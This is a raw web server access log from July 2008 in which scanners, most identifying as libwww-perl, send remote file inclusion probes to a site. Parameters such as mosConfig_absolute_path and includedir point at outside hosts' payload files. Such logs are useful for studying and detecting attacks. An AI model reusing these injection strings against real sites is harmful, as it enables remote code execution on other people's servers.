74.6.18.246 - - [14/Jul/2008:09:01:07 -0700] "GET /logs/access_080203.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.122.200.198 - - [14/Jul/2008:09:02:03 -0700] "GET ///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.lestari.or.id/test?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
212.122.200.198 - - [14/Jul/2008:09:02:03 -0700] "GET /logs///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.lestari.or.id/test?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:09:02:07 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:09:02:20 -0700] "GET //tools/send_reminders.php?includedir=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:09:02:20 -0700] "GET /logs//tools/send_reminders.php?includedir=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:03:33 -0700] "GET /logs/index.php?subp=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:03:33 -0700] "GET /logs/index.php?subp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:09:03:37 -0700] "GET /logs/access_080329.log/includes/ktedit/toolbar.php?dirDepth=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:03:39 -0700] "GET /index.php?subp=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18393 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:03:40 -0700] "GET /index.php?subp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18367 "-" "libwww-perl/5.69" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:09:03:42 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:09:04:01 -0700] "GET //Neos_Chronos/header.php?base_folder=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:09:04:01 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.246.7.92 - - [14/Jul/2008:09:04:13 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.7.92 - - [14/Jul/2008:09:04:13 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.7.92 - - [14/Jul/2008:09:04:14 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:09:04:34 -0700] "GET /logs/access_080315.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.69.127.189 - - [14/Jul/2008:09:04:35 -0700] "GET /logs//errors.php?error=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.189 - - [14/Jul/2008:09:04:35 -0700] "GET //errors.php?error=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.189 - - [14/Jul/2008:09:04:35 -0700] "GET /logs/access.log//errors.php?error=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.189 - - [14/Jul/2008:09:05:08 -0700] "GET /logs/access_080313.log//errors.php?error=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:09:05:09 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:09:05:09 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:09:05:09 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:09:05:22 -0700] "GET /logs//tools/send_reminders.php?includedir=http://lamer.newsit.es/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:09:05:22 -0700] "GET //tools/send_reminders.php?includedir=http://lamer.newsit.es/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:09:06:54 -0700] "GET /logs//tools/send_reminders.php?includedir=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:09:06:54 -0700] "GET //tools/send_reminders.php?includedir=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.246.7.92 - - [14/Jul/2008:09:07:23 -0700] "GET /logs/access_080129.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.27.1.194 - - [14/Jul/2008:09:08:30 -0700] "GET //tools/send_reminders.php?includedir=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
218.27.1.194 - - [14/Jul/2008:09:08:30 -0700] "GET /logs//tools/send_reminders.php?includedir=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:09:08:57 -0700] "GET /logs/access_080329.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:09:08:57 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:09:08:57 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:09:22 -0700] "GET /index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:09:22 -0700] "GET /index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:09:10:18 -0700] "GET /download.php?sub=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.44.160.130 - - [14/Jul/2008:09:11:12 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.44.160.130 - - [14/Jul/2008:09:11:12 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.44.160.130 - - [14/Jul/2008:09:11:18 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.44.160.130 - - [14/Jul/2008:09:11:19 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.180.39.222 - - [14/Jul/2008:09:11:26 -0700] "GET /include/statistic.inc.php?tm_includepath=http://e-arhontariki.gr/images/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.11.212.194 - - [14/Jul/2008:09:11:42 -0700] "GET /logs/access_080124.log HTTP/1.0" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
70.85.31.117 - - [14/Jul/2008:09:12:01 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 655360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:09:12:21 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.57 - - [14/Jul/2008:09:12:57 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.seucu.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:09:13:27 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:09:13:37 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 200 56141 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:09:13:41 -0700] "GET //?custompluginfile%5B%5D=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 200 18443 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
208.180.39.222 - - [14/Jul/2008:09:13:49 -0700] "GET /logs/access_080315.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.180.39.222 - - [14/Jul/2008:09:13:49 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.180.39.222 - - [14/Jul/2008:09:13:50 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:14:09 -0700] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:14:09 -0700] "GET /include/Classes.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:14:09 -0700] "GET /include/statistic.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:14:09 -0700] "GET /include/status_top_x.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:14:20 -0700] "GET /logs/access.log/index.php?trans=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:14:22 -0700] "GET /index.php?trans=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 200 18433 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:14:22 -0700] "GET /logs/index.php?trans=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:09:15:14 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:16:18 -0700] "GET /include/status.inc.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:09:16:54 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 200 56141 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:09:16:55 -0700] "GET //?custompluginfile%5B%5D=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 200 18441 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:09:17:35 -0700] "GET /allinurl:index.php?root_PATH=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:09:17:37 -0700] "GET /logs/allinurl:index.php?root_PATH=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
74.84.202.165 - - [14/Jul/2008:09:18:39 -0700] "GET /logs//index.php?loc=start&page=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
74.84.202.165 - - [14/Jul/2008:09:18:48 -0700] "GET //index.php?loc=start&page=http://lamer.newsit.es/test.txt??? HTTP/1.1" 200 18421 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:18:50 -0700] "GET /logs/access_080329.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:18:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:18:50 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:19:55 -0700] "GET /logs/access_080228.log/index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:19:55 -0700] "GET /logs/index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:20:01 -0700] "GET /logs/access_080313.log/task.php?task=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:20:01 -0700] "GET /task.php?task=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [14/Jul/2008:09:20:01 -0700] "GET /logs/task.php?task=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:09:20:22 -0700] "GET /logs/access.log/includes/ktedit/toolbar.php?dirDepth=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:09:21:32 -0700] "GET /logs/str.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:09:21:33 -0700] "GET /str.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:09:21:36 -0700] "GET /logs/access_080331.log/page.php?doc=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:09:21:37 -0700] "GET /page.php?doc=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:09:21:38 -0700] "GET /logs/page.php?doc=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:09:22:16 -0700] "GET /logs/index2.php?x=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:09:22:16 -0700] "GET /index2.php?x=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:22:28 -0700] "GET /logs/str.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:22:28 -0700] "GET /str.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:23:40 -0700] "GET /logs/str.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:23:40 -0700] "GET /str.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:24:09 -0700] "GET //calendar.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:24:09 -0700] "GET //calendar.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.130.242.135 - - [14/Jul/2008:09:24:17 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [14/Jul/2008:09:24:18 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.101.71 - - [14/Jul/2008:09:24:35 -0700] "GET /errors.php?error=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:09:24:59 -0700] "GET /logs/access_080313.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:09:25:00 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:09:25:01 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:09:25:06 -0700] "GET /logs/allinurl:index.php?root_PATH=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:09:25:07 -0700] "GET /allinurl:index.php?root_PATH=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:09:25:32 -0700] "GET /logs/middle.php?page=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:09:25:32 -0700] "GET /logs/middle.php?page=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:09:25:32 -0700] "GET /middle.php?page=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:09:25:32 -0700] "GET /middle.php?page=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:09:26:35 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:09:26:35 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.119 - - [14/Jul/2008:09:27:22 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://75.125.130.242/analmovies/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [14/Jul/2008:09:27:22 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://75.125.130.242/analmovies/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:09:27:30 -0700] "GET /logs/allinurl:index.php?root_PATH=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:09:27:31 -0700] "GET /allinurl:index.php?root_PATH=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:09:27:32 -0700] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:09:27:32 -0700] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:09:27:37 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:09:27:38 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:09:27:51 -0700] "GET /logs/include/status.inc.php?tm_includepath=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:09:27:51 -0700] "GET /include/status.inc.php?tm_includepath=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:09:27:58 -0700] "GET /logs/include/statistic.inc.php?tm_includepath=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:09:27:58 -0700] "GET /include/statistic.inc.php?tm_includepath=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [14/Jul/2008:09:27:59 -0700] "GET /logs/errors.php?error=http://75.125.130.242/analmovies/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [14/Jul/2008:09:27:59 -0700] "GET /errors.php?error=http://75.125.130.242/analmovies/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:09:28:12 -0700] "GET /logs/access_080423.log/include/libchart-1.1/libchart.php?tm_includepath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
